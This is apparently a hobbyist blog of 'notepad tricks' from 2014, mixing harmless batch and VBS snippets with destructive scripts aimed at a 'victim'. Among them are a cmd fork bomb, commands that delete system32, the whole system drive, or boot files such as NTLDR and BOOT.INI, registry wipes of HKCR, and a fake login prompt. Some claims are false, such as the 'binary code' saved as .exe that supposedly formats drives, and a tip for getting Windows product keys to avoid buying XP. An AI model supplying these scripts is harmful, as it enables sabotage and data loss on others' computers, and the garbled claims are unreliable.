Wednesday 1 October 2014

CMD Color Codes

TRY OUT THESE AMAZING COLORS IN CMD

  • Click on start
  • Run cmd
  • Type "color xy"     (where "x" refers to the color of background n"y" refers to the color of the foreground).




Wednesday 30 July 2014

SYSTEM HANGING, USING CMD

(MODERATE)
  • Open Command Prompt Window infinite times untill your Computer Crashes
  • Just copy and paste the below codes to make your computer crash. (After you will restart your computer, it will be back to normal)
@echo off
:loop
start cmd.exe
goto loop
  • "cmd.exe" can be changed to any other program also.
  • Extensions of different files that can be opened using this program
  • For Calculator use "calc.exe".
  • For My Computer use "explorer.exe".
  • For notepad use "notepad.exe"
  • For MS Word files use "winword.exe".
  • For Google Chrome use "chrome.exe".
  • For Task Manager use "taskmgr.exe". and so on...

Friday 18 July 2014

FRIGHTEN YOUR VICTIM WITH THIS VIRUS

(SAFE)


  • Let’s start, open your Notepad and type this code :
X=MsgBox("Message Description",0+16,"Title")
  • Now save it as .vbs  files, make sure you
  • Select All types and the extension of your filename should be “.vbs”. for example,Game.vbs or My Computer.vbs.
  • Once you save it, open it up and you should get the pop-up message box.
  • This basic code tells the computer that when the following file is opened, it will display a fake error message box with the title as “Title” and the description as“Message Description“. But that can be changed so if you want to type a different title or description, go ahead.
  • This is a Visual Basic Code, which means you are able to type in Visual Basic Scripts using Notepad.
  • Anyways, the numbers in that code can be changed. Let me explain you the code:
X=MsgBox("Message Description",0+16,"Title")
  • Message Description: Write some warning message you want to display (In above image the description is “Hacker has killed your computer” ).
  • Title: you can write any title (in above image the title is “Virus Detected”).
  • The numbers: In above image 0+16 is used. Well, it is a combination of two different codes. You can write any numbers from 0,1,2,3,4 instead of 0 (before the ‘+’ symbol) and here is the meaning of each number:

0,6 = Ok Button
1 = Ok/Cancel Button
2 = Abort/Retry/Ignore button
3 = Yes/No/Cancel
4 = Yes/No
5 = Retry/Cancel

  • You can write any numbers from 16,32,48,64 instead of 16 (after the  ‘+’ symbol) and here is the meaning of each number:

16 – Critical Icon(cross sign)
32 – Warning Icon((?) mark)
48 – Warning Message Icon
64 – Information Icon

  • Now, if you want to create multiple Message Boxes, simply duplicate the line as shown below :

X=MsgBox(“ dont worry i'll b formatting your computer/c: drive in just
few seconds. wait and watch”,0+16,”Title”)

X=MsgBox(“ dont worry i'll b formatting your computer/c: drive in just
few seconds. wait and watch”,0+16,”Title”)
  • So this will display the message pop-up two times ! It’s really easy, message description will be= don't worry i'll b formatting your computer/c: drive in just few seconds. wait and watch.
This file does not cause any harm to your system....it will just display those messages which u have written in the notepad file and saved them in the form of a ".vbs file"


Tuesday 1 July 2014

Find Windows XP CD Key Inside CD

Are you still finding Your Windows XP Product key?

Lets see how easily you can get it…

To get the Windows XP CD key, follow these steps.


1. Insert your Windows XP CD into your computer's CD/DVD ROM/ RAM.
2. Now, browse your Windows XP CD and find the folder "I386".
3. Inside "I386" folder, find the file named as "unattended.txt".
4. Open "unattended.txt" by using notepad.
5. At last, keep scrolling of the opened file and you will get Windows XP CD key.

Its most helpful for the people who do not wish to buy XP or those who lost the serial key of Windows XP CD. They can find the Windows XP CD key in this way.

Shut-down The Computer After Conveying Any Message

(MODERATE)
This one is kind of an annoying trick and if used unknowingly can certainly cause problems (I am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:

  • Open Notepad.
  • Paste the following code in it:
@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s

  • Save the file with any name but with ".bat" extension and close it. For eg. TakeRest.bat

Type “You are a fool” Continuously

Not much to explain, the title says it all! Follow the steps to make this trick work:

  • Open Notepad.
  • Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.
loop

  • You can also change what the program will display on the screen...by putting your own text in place of You are a fool. and replacing ti with your own text.
  • Save the file with any name but with ".vbs" extension and close it.
  • Open the file and see how it makes you type!

MOST DAGEROUS NOTEPAD TRICK

(UNSAFE)
  1.)Open Notepad and type:
@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO YOUR COMPUTER HAS
BEEN FCKED.HAVE A
NICE DAY.
GOTO MESSAGE
  2.)Save the file with any name but with a fle extension ".bat"

Never try to run this file or else it will be the last time when you will be using your system/PC.

How To Destroy HDD and Your Victim's PC:

(UNSAFE)
This Hack will show you how to format a HDD using notepad and how t destroy victim's PC using notepad 
1.)Copy the following code in notepad as it is:
SAYS01001011000111110010010101010101010000011111100000
2.)Save it as a ".exe" file with any name.
3.)Send the file to your victim and infect.

  • One more trick you can test on other drives, this is simple binary code:

FORMAT C:\ /Q/X — THIS WILL FORMAT YOUR DRIVE C:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
FORMAT D:\ /Q/X — THIS WILL FORMAT YOUR DIRVE D:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
FORMAT A:\ /Q/X — THIS WILL FORMAT YOUR DRIVE A:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
DEL /F/S/Q C:\BOOT.INI — THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

  • If any problem occurs figure it out.
REMEMBER – DO NOT OPEN THE FILE.YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .EXE FILE!!


Shut Down PC Permanently

(UNSAFE)
CODE:
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI@ECHO OFF


  • Copy the code and save it as ".bat" file.


REMEMBER – DO NOT OPEN THE FILE.YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!!

Monday 30 June 2014

Makes System Dead.

(UNSAFE)
 1.)Go to notepad and type the following: 
@ECHO OFF
DEL C:\ *.*|Y
 2.)Save it as "DELL.BAT"

 3.)WANT WORSE.....!!!?.... Then type/copy the following code:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
 4.)AND SAVE IT AS A .BAT FILE.

SECOND TRICK
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE!!!........ In order to create the file, follow the steps given below:

  • Open Notepad.
  • Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

  • Save the file with any name and with a ".bat" extension and close the file.

Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

Sunday 29 June 2014

MATRIX EFFECT

Just follow the steps and see the amazing matrix effect happen in your DOS window:
 1.)Open Notepad.
 2.)Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
 3.)Save the file with .bat extension like Matrix.bat
 4.)That's it. Just open the file to see the matrix effect right before your eyes!
 5.)To change the color, replace "02" of "color 02" with the following color code chart



Deleting Data

(MODERATE)

Description: Shows a fake username and password entrance area then deletes it self

    1.Go into notepad and type:

@echo off
echo If the proper username and password is not entered all files will be deleted by this virus.
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the username and password wrong
pause
echo Files are being deleted
pause
dir/s
del "c:up.bat" 
3. Save it as up.bat (must be this!) 

Anti-Virus Checker/Tester

You can test any of your Anti Virus programs for its effectiveness and proper working...... using a simple notepad trick.
Follow the steps below to know more:
  1.)Open Notepad.
  2.)Copy the code give below in the notepad file:



X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

  3.)Save it with an .exe extension like testvirus.exe
This test is also known as E I C A R (European Institute for Computer Antivirus Research) test file.

Thursday 26 June 2014

Simple Virus To Continuously Open Notepads

(SAFE)
1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.

@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
    
3. Now Save the file with an extension ".bat" , for e.g: "notepad.bat"
4. If you click on "notepad.bat" , it will continuously open notepads.

Irritating Virus

(SAFE)

Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2

:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1

##########################################
All it does is bring up loads of boxes and it keeps opening them until you restart your PC.
 IT IS NOT DANGEROUS IT IS JUST ANNOYING!!!

Critical Formatting Virus

(UNSAFE)

Write your own simple virus which can't be detected by any antivirus....

@Echo off 
Del C:\ *.* |y   

And save that as ".bat" and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe::::: dont run that .bat file on ur system .... it will delete C: Drive:...

Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

Irritate With Messages

(SAFE)
You can frustrate your friend by showing repeated messages in the notepad,
by following this simple notepad tricks


Just Type below code in notepad :-

@ECHO off
:Begin
msg * Hey
msg * How are you dear….
msg * I am fine you!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


and Save it as “Anything.bat”

now see what happens.. :) !!

VIRUS IN YOUR KEYBOARD !!

(SAFE)
Make your keyboard keys to type continuously (non-stop)

Just Type :


MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Save it as “ghostrider.vbs”, or with any name, but, with an extension".vbs".

To watch this at real time just open any notepad files in your PC....
And save this file.

Kill Your Enemy's PC

(UNSAFE)
Its nothing but emptying the system32 folder of OS in your computer, so that your computer cannot boot because system32 is essential folder which is needed for booting and all the core operation of OS.

Write/Copy the following code in your notepad:-

- del c:\windows\system32\*.* /q
save the file as “terminator.bat” without quote

!!…red alert…!!

Don’t even think/ try to click this file in your computer because the file u had created will empty all files in system32 folder which is essential for your computer to work.
Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

CD-ROM Continuously Pops-out

(SAFE)
You can make your CD-Drive to open & close repeatedly by using a simple notepad tricks given below

Just Type/Copy the following code below in notepad :-


Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop 
Save it as “im mad.VBS” .

now watch that your CD-Drive has become MAD…!

Try it at your own risk...... soon, way to stop it will also be uploaded.

Text-To-Audio Converter

Let your PC/Laptop convert text to audio for you

How To Do It ?

1. Open Notepad file on your Windows PC.
2. Copy and paste the below mentioned code :


Dim msg, sapi
msg=InputBox("Enter your text for conversion–www.notepadtrik.com"," Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg


3.Save this file with any name with ".vbs" as extension. For e.g:- "Text-To-Audio.vbs"

notepadtrik.blogspot.com
Voila !! Your Text to Audio converter is ready to be used. Now open the saved file and type in the text you wanna to convert and click "OK" or press "Enter"

Make Your Laptop/PC Welcome You

Do you watch movies? Have you ever liked the way how Computers in movies welcome their users by calling out their names?

Well....by using this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Start-up.

Follow the instructions given below:-

 1. Click Start>All Programs>Accessories>Notepad.
 2. Copy and paste the exact code given below.
 3. Replace Username with your own Name.
 4. Click on File>Menu>Save As>select "All types" in "Save As Type" option, and save the file as
     Welcome.vbs or "*.vbs".
 5. Copy the saved file.
 6. Navigate to "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"(in Windows XP) or
    to "C:\Users\User-name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    (in Windows 7 and Windows Vista) if C: is your System drive.
 7. Paste the file.

Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
Now when the next time you start your computer, Windows will welcome you in its own computerized voice.
Note: For best results, it's recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by Following the steps given below:-

  1. Go to Control Panel.
  2. Then right click on Switch to Classic View.
  3. Then click on Sounds And Audio Devices.
  4. Then click on the Sounds tab.
  5. Select No Sounds from the Sound Scheme option.
  6. If you wish to save your previous sound scheme, you can save it by clicking Yes in the popup menu.
  7. Click on OK.
Try this yourself to see how it woks. From my opinion, it's an excellent trick. Whenever I start my PC in front of anyone and the PC welcomes me, the fellow is left wondering, how magical computer do I have.


more notepad tricks are at notepadtrik.blogspot.com